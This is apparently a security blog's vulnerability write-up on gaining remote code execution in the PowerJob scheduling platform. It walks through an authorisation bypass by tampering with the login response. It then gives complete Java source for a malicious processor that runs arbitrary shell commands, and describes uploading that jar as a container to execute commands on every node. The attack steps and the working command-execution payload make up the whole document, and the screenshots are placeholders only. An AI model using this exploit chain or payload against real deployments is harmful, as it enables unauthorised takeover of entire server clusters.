PowerJob Remote Code Execution
First, open the homepage, click the App Registration button:
image.png
Then use the application and password just registered to log in, capture the package and modify the data field in the return package, and now I can log in to the background of other applications beyond my authority:

image.png
image.png

We can click Container DevOps - Template generator, fill in the information and get a zip package.

Then we add our own malicious code to the package,just like this :
image.png
Using the maven package command to package the jar, now I have packaged a malicious jar file:
payload
Source Code:

@Component
public class SimpleProcessor implements BasicProcessor {

    @Override
    public ProcessResult process(TaskContext taskContext) {
        OmsLogger omsLogger = taskContext.getOmsLogger();
        omsLogger.info("SimpleProcessor start to process, current JobParams is {}.", taskContext.getJobParams());
        String command = taskContext.getInstanceParams();
        ProcessBuilder builder = new ProcessBuilder();
        Process process = null;
        try {
            if (SystemUtils.IS_OS_WINDOWS) {
                process = builder.command("cmd.exe", "/c", command).redirectErrorStream(true).start();
            } else {
                process = builder.command("sh", "-c", command).redirectErrorStream(true).start();
            }
            InputStream inputStream = process.getInputStream();
            BufferedReader reader = new BufferedReader(new InputStreamReader(inputStream));
            String line;
            while ((line = reader.readLine()) != null) {
                omsLogger.info(line);
            }
        } catch (IOException e) {
            throw new RuntimeException(e);
        }
        return new ProcessResult(true, "simple processor finished with params=" + command);
    }
}

Click Container Management,New container,FastJar,Upload a malicious jar file:

image.png
Click save button,Now we can see the container:
image.png

Now click the deploy button to inject malicious code into all nodes:

image.png
Then go to the task management page, click the New job button, fill in the information like this
container’s ID#org.example.demo.SimpleProcessor
Schedule info:API
image.png
Click More in the task list and the parameters run:

image.png
Enter the command to execute, the command will be executed in all machine nodes:

image.png
After a few seconds all nodes will execute the command you just entered::

image.png

文章作者: TestNet
本文链接:
版权声明: 本站所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 TestNet
代码审计
喜欢就支持一下吧